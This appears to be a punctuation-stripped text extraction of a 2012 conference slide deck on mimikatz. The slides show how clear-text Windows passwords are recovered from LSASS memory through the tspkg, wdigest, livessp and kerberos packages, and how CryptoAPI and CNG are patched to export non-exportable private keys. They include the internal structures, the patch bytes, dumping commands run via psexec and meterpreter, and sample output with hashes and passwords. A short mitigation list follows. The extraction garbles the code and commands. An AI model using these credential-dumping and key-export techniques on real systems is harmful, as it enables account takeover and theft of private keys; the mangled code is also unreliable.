ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memorybull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe)bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9
mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10
mimikatz sekurlsa tspkgwhat is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquosexperiencendash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation)ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11
mimikatz sekurlsa tspkgquestions
KB says that for it works we must enable laquo Default credentials raquo delegationndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellipndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCredsbull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos)bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12
mimikatz sekurlsa tspkgsymbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenariondash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13
kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
